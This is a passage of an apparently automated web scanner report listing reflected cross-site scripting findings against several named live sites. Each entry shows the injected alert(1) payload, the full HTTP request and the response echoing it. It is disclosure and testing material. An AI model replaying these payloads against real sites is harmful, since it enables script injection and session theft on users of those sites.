Last-Modified: Wed, 31 Aug 2011 21:49:07 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 01 Sep 2011 21:49:07 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 31 Aug 2011 21:49:07 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K05540ED672<SCRIPT>ALERT(1)</SCRIPT>E8459F403C7" was not recognized.
*/

4.101. http://mads.techrepublic.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.techrepublic.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload ca568<a>8469a0c1935 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=11&NCAT=12841%3A30994%3A&PTYPE=2100&CID=183029&NODE=30994&BRAND=9&CNET-PAGE-GUID=GFS6RAoPOhwAAARvhywAAABI&TAG=Google%2BInc.%3BApple%2BMacintosh%3BApple%2BSafari%3BWeb%2BBrowser%3BGoogle%2BChrome&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=97043431&IREFER_HOST=google.com&ADREQ&beacon=1ca568<a>8469a0c1935&cookiesOn=1 HTTP/1.1
Host: mads.techrepublic.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:50:16 GMT
Server: Apache/2.2
Content-Length: 630
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 31 Aug 2011 21:50:16 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=11&NCAT=12841%3A30994%3A&PTYPE=2100&CID=183029&NODE=30994&BRAND=9&CNET-PAGE-GUID=GFS6RAoPOhwAAARvhywAAABI&TAG=Google%2BInc.%3BApple%2BMacintosh%3BApple%2BSafari%3BWeb%2BBrowser%3BGoogle%2BChrome&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=97043431&IREFER_HOST=google.com&ADREQ&beacon=1ca568<a>8469a0c1935&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1568846901935' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw3.cnet.com::1399384
...[SNIP]...

4.102. http://mads.techrepublic.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.techrepublic.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6ef3'%3balert(1)//ea97ed25b95 was submitted in the PAGESTATE parameter. This input was echoed as d6ef3';alert(1)//ea97ed25b95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=d6ef3'%3balert(1)//ea97ed25b95&SITE=11&NCAT=12841%3A30994%3A&PTYPE=2100&CID=183029&NODE=30994&BRAND=9&CNET-PAGE-GUID=GFS6RAoPOhwAAARvhywAAABI&TAG=Google%2BInc.%3BApple%2BMacintosh%3BApple%2BSafari%3BWeb%2BBrowser%3BGoogle%2BChrome&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=97043431&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.techrepublic.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:49:55 GMT
Server: Apache/2.2
Content-Length: 233
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 31 Aug 2011 21:49:55 GMT

/* MAC ad */;window.CBSI_PAGESTATE='d6ef3';alert(1)//ea97ed25b95';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c17-ad-xw6.cnet.com::3033344912 2011.08.31.21.49.55 *//* MAC T 0.0.0.0 */

4.103. http://mads.techrepublic.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.techrepublic.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload f685b<a>c254e1d7c3b was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=11f685b<a>c254e1d7c3b&NCAT=12841%3A30994%3A&PTYPE=2100&CID=183029&NODE=30994&BRAND=9&CNET-PAGE-GUID=GFS6RAoPOhwAAARvhywAAABI&TAG=Google%2BInc.%3BApple%2BMacintosh%3BApple%2BSafari%3BWeb%2BBrowser%3BGoogle%2BChrome&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=97043431&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.techrepublic.com
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:49:56 GMT
Server: Apache/2.2
Content-Length: 674
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 31 Aug 2011 21:49:56 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=11f685b<a>c254e1d7c3b&NCAT=12841%3A30994%3A&PTYPE=2100&CID=183029&NODE=30994&BRAND=9&CNET-PAGE-GUID=GFS6RAoPOhwAAARvhywAAABI&TAG=Google%2BInc.%3BApple%2BMacintosh%3BApple%2BSafari%3BWeb%2BBrowser%3BGoogle%2BChrome&cookiesO
...[SNIP]...

4.104. http://ndparking.com/serve.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ndparking.com
Path:	/serve.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9959d<img%20src%3da%20onerror%3dalert(1)>686a587fb64 was submitted in the REST URL parameter 1. This input was echoed as 9959d<img src=a onerror=alert(1)>686a587fb64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /serve.php9959d<img%20src%3da%20onerror%3dalert(1)>686a587fb64?lid=583648&dn=toyhookupinc.com HTTP/1.1
Host: ndparking.com
Proxy-Connection: keep-alive
Referer: http://www.toyhookupinc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:19:39 GMT
Server: Apache
Expires: Thu, 29 Oct 1998 17:04:19 GMT
Last-Modified: Wed, 31 Aug 2011 21:19:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 89
Content-Type: text/html; charset=UTF-8

invalid domain name: serve.php9959d<img src=a onerror=alert(1)>686a587fb64 -- invalid tld

4.105. http://ndparking.com/serve.php [dn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ndparking.com
Path:	/serve.php

Issue detail

The value of the dn request parameter is copied into the HTML document as plain text between tags. The payload bc5bd<img%20src%3da%20onerror%3dalert(1)>1d43d8ca98c was submitted in the dn parameter. This input was echoed as bc5bd<img src=a onerror=alert(1)>1d43d8ca98c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /serve.php?lid=583648&dn=toyhookupinc.combc5bd<img%20src%3da%20onerror%3dalert(1)>1d43d8ca98c HTTP/1.1
Host: ndparking.com
Proxy-Connection: keep-alive
Referer: http://www.toyhookupinc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:18:31 GMT
Server: Apache
Expires: Thu, 29 Oct 1998 17:04:19 GMT
Last-Modified: Wed, 31 Aug 2011 21:18:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 96
Content-Type: text/html; charset=UTF-8

invalid domain name: toyhookupinc.combc5bd<img src=a onerror=alert(1)>1d43d8ca98c -- invalid tld

4.106. http://ndparking.com/serve.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ndparking.com
Path:	/serve.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ab66<img%20src%3da%20onerror%3dalert(1)>fba4a16700b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4ab66<img src=a onerror=alert(1)>fba4a16700b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /serve.php?lid=583648&dn=toyhookupinc/4ab66<img%20src%3da%20onerror%3dalert(1)>fba4a16700b.com HTTP/1.1
Host: ndparking.com
Proxy-Connection: keep-alive
Referer: http://www.toyhookupinc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:19:01 GMT
Server: Apache
Expires: Thu, 29 Oct 1998 17:04:19 GMT
Last-Modified: Wed, 31 Aug 2011 21:19:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 101
Content-Type: text/html; charset=UTF-8

invalid domain name: toyhookupinc/4ab66<img src=a onerror=alert(1)>fba4a16700b.com -- dot not present

4.107. http://oee.sandals.com/includes/calendar/formCalendar.cfm [targetRow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oee.sandals.com
Path:	/includes/calendar/formCalendar.cfm

Issue detail

The value of the targetRow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc89f"><script>alert(1)</script>2cb911969fb was submitted in the targetRow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/calendar/formCalendar.cfm?the_field=checkoutdate&targetRow=calendarRow2bc89f"><script>alert(1)</script>2cb911969fb HTTP/1.1
Host: oee.sandals.com
Proxy-Connection: keep-alive
Referer: http://oee.sandals.com/index.cfm?event=ehGeneral.dspRegisterBooking&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2518259; CFTOKEN=99194776

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:19:13 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21291

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Ca
...[SNIP]...
<a href="./formCalendar.cfm?start_date=7/31/2011&the_field=checkoutdate&targetRow=calendarRow2bc89f"><script>alert(1)</script>2cb911969fb">
...[SNIP]...

4.108. http://oee.sandals.com/includes/calendar/formCalendar.cfm [the_field parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oee.sandals.com
Path:	/includes/calendar/formCalendar.cfm

Issue detail

The value of the the_field request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93bc"><script>alert(1)</script>15144e7e833 was submitted in the the_field parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/calendar/formCalendar.cfm?the_field=checkoutdatee93bc"><script>alert(1)</script>15144e7e833&targetRow=calendarRow2 HTTP/1.1
Host: oee.sandals.com
Proxy-Connection: keep-alive
Referer: http://oee.sandals.com/index.cfm?event=ehGeneral.dspRegisterBooking&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2518259; CFTOKEN=99194776

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:19:12 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23699

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Ca
...[SNIP]...
<a href="./formCalendar.cfm?start_date=7/31/2011&the_field=checkoutdatee93bc"><script>alert(1)</script>15144e7e833&targetRow=calendarRow2">
...[SNIP]...

4.109. http://orders.allmenus.com/content/dfp.asp [position parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://orders.allmenus.com
Path:	/content/dfp.asp

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51d9"%3balert(1)//fc057915e27 was submitted in the position parameter. This input was echoed as b51d9";alert(1)//fc057915e27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/dfp.asp?position=am_skyscaper_menub51d9"%3balert(1)//fc057915e27 HTTP/1.1
Host: orders.allmenus.com
Proxy-Connection: keep-alive
Referer: http://orders.allmenus.com/menu/items.asp?restid=11893&campusid=835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=TempOrderId=vLIZLMMeG%2B9J4VBATyiJUw%3D%3D; locationId=c36061; ASPSESSIONIDCQCSCRSB=BHOPBENBFGIMOBLFAKFBKOAG

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 11 Aug 2011 22:47:26 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<script type="text/javascript">
       try{
           GA_googleAddSlot("ca-pub-4097627658675326", "am_skyscaper_menub51d9";alert(1)//fc057915e27");
       }catch(err){}
</script>
...[SNIP]...

4.110. http://origin.collective-media.net/adj/ns.informit/homepage [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://origin.collective-media.net
Path:	/adj/ns.informit/homepage

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d395'-alert(1)-'02d5b309f8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/ns.informit3d395'-alert(1)-'02d5b309f8a/homepage;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836? HTTP/1.1
Host: origin.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:39 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:39 GMT
Content-Length: 480

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/ns.informit3d395'-alert(1)-'02d5b309f8a/homepage;ppos=atf;kw=;tile=1;sz=728x90;net=ns;ord=3538776447530836?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.111. http://origin.collective-media.net/adj/ns.informit/homepage [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://origin.collective-media.net
Path:	/adj/ns.informit/homepage

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc36e'-alert(1)-'bd390394690 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/ns.informit/homepagecc36e'-alert(1)-'bd390394690;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836? HTTP/1.1
Host: origin.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:40 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:40 GMT
Content-Length: 480

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/ns.informit/homepagecc36e'-alert(1)-'bd390394690;ppos=atf;kw=;tile=1;sz=728x90;net=ns;ord=3538776447530836?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.112. http://origin.collective-media.net/adj/ns.informit/homepage [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://origin.collective-media.net
Path:	/adj/ns.informit/homepage

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7178'-alert(1)-'eed06b52a24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/ns.informit/homepage;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836?&d7178'-alert(1)-'eed06b52a24=1 HTTP/1.1
Host: origin.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:38 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:38 GMT
Content-Length: 483

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/ns.informit/homepage;ppos=atf;kw=;tile=1;sz=728x90;net=ns;ord=3538776447530836?&d7178'-alert(1)-'eed06b52a24=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.113. http://origin.collective-media.net/adj/ns.informit/homepage [ppos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://origin.collective-media.net
Path:	/adj/ns.informit/homepage

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edd6b'-alert(1)-'bf426a113ed was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/ns.informit/homepage;ppos=atf;kw=;tile=1;sz=728x90;ord=3538776447530836?edd6b'-alert(1)-'bf426a113ed HTTP/1.1
Host: origin.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:37 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 30-Sep-2011 17:54:37 GMT
Content-Length: 480

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/ns.informit/homepage;ppos=atf;kw=;tile=1;sz=728x90;net=ns;ord=3538776447530836?edd6b'-alert(1)-'bf426a113ed;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.114. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5461951393721719569 [hl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/data/feed/api/user/117176959269632963044/albumid/5461951393721719569

Issue detail

The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bcc3a%3balert(1)//9a1d8570383 was submitted in the hl parameter. This input was echoed as bcc3a;alert(1)//9a1d8570383 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /data/feed/api/user/117176959269632963044/albumid/5461951393721719569?alt=rss&kind=photo&hl=en_USbcc3a%3balert(1)//9a1d8570383 HTTP/1.1
Host: picasaweb.google.com
Proxy-Connection: keep-alive
Referer: http://picasaweb.google.com/s/c/bin/slideshow.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=50=cMjpsScbxYBA86D8h-EH6vhVyPj-fsQRP2Z2YiyE7HQN1XRNmNWJwonTkx9AxfKcEf4kxwysSri20Ay-owIVxtC9Lx0bpNT-EEO0q8JSwNP4MMsti1QTi5LrexkUGf1t; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i

Response

HTTP/1.1 400 Bad Request
Expires: Wed, 31 Aug 2011 16:44:09 GMT
Date: Wed, 31 Aug 2011 16:44:09 GMT
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 64

Invalid value for hl parameter: en_USbcc3a;alert(1)//9a1d8570383

4.115. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5461951393721719569 [kind parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/data/feed/api/user/117176959269632963044/albumid/5461951393721719569

Issue detail

The value of the kind request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1292f%3balert(1)//5587302e2 was submitted in the kind parameter. This input was echoed as 1292f;alert(1)//5587302e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /data/feed/api/user/117176959269632963044/albumid/5461951393721719569?alt=rss&kind=photo1292f%3balert(1)//5587302e2&hl=en_US HTTP/1.1
Host: picasaweb.google.com
Proxy-Connection: keep-alive
Referer: http://picasaweb.google.com/s/c/bin/slideshow.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
